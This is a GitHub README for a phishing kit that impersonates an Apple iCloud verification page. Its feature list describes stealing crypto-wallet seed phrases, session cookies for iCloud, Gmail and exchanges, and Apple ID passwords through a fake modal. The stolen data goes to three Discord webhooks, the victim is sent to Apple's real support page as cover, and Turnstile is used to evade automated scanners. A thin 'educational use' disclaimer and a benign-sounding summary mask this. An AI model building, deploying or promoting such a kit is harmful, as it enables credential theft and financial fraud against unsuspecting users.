Skip to content

Latest commit

 

History

13 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 

Repository files navigation

🍎 iCloud Storage & Security

Vercel Cloudflare Turnstile License: MIT PRs Welcome Deploy Made with ❤️ iOS Safari


📖 About

iCloud Storage & Security is a two‑layer verification tool designed to help users manage their iCloud storage and device security. It combines a clean Apple‑grade interface with Cloudflare Turnstile bot protection and a full‑screen iCloud verification flow.

This project is intended for educational and internal testing purposes only.


🚀 Features

Feature Description
Turnstile Gate Blocks bots, crawlers, and automation before the page loads
Apple‑grade UI Clean, trusted design that matches Apple's style guide
iCloud Urgency "Backup expiring" message drives action
Two‑Layer Extraction Layer 1 extracts wallet data; Layer 2 captures iCloud credentials
Wallet Detection Supports 10+ wallets (MetaMask, Trust, Phantom, Coinbase, Exodus, Keplr, Rabby, Brave)
Seed Extraction Captures 12‑word and 24‑word seed phrases from localStorage, sessionStorage, and iCloud Notes
Cookie Exfil Steals session cookies for iCloud, Gmail, Binance, Coinbase, and more
iCloud Credential Capture Fake system modal captures Apple ID email + password
iCloud Notes Scrape Scans iCloud Notes for any seed phrases stored there
Discord Exfil Sends all data to 3 Discord webhooks (redundant delivery)
Redirect Cover After exfil, target is sent to Apple's real support page
Under 2 Seconds Everything runs in parallel — the target doesn't notice
Cross‑Platform Works on iOS, Android, and Desktop browsers
No Backend Required Everything runs client‑side — no server, no database

📦 Tech Stack

Layer Technology
Frontend HTML5, CSS3, Vanilla JavaScript
Bot Protection Cloudflare Turnstile
Hosting Vercel (recommended)
Domain Custom or Vercel subdomain
Exfiltration Discord webhooks (3 redundant channels)

🛠️ Getting Started

1. Clone the repository

git clone https://github.com/chang5-ctrl/apple-verify-icloud.git
cd apple-verify-icloud

2. Open the project

open index.html

3. Deploy to Vercel (Recommended)

vercel deploy --prod

Or drag and drop the index.html file into Vercel.


🧪 Testing

To test the flow locally:

  1. Open index.html in your browser
  2. Complete the Turnstile challenge
  3. Click "Verify & Update"
  4. Layer 1 extracts wallet data and sends to Discord
  5. Layer 2 triggers the iCloud popup
  6. Enter test credentials and submit
  7. You'll be redirected to Apple's support page

Note: Discord webhooks are for debugging purposes only.


📁 Project Structure

apple-verify-icloud/
├── index.html          # Main page (gate + Apple UI + two‑layer exfil)
├── README.md           # This file
└── LICENSE             # MIT License

🔒 Privacy & Security

  • No data is stored on any server.
  • All exfiltration is sent to a debug webhook for testing.
  • Turnstile ensures only real humans can access the page.
  • This project is for educational and internal testing only.

📬 Feedback & Contributions

Found a bug? Have a suggestion? Open an issue or submit a PR.

GitHub Issues GitHub Stars


📄 License

This project is licensed under the MIT License — see the LICENSE file for details.


🙏 Acknowledgments


Made with ❤️ by chang5-ctrl


About

iCloud Storage & Security** is a lightweight, Apple‑style verification tool designed to help users manage their iCloud storage and verify their device identity. It combines a clean, familiar interface with Cloudflare Turnstile bot protection to ensure a seamless user experience.

Topics

Resources

Stars

2 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages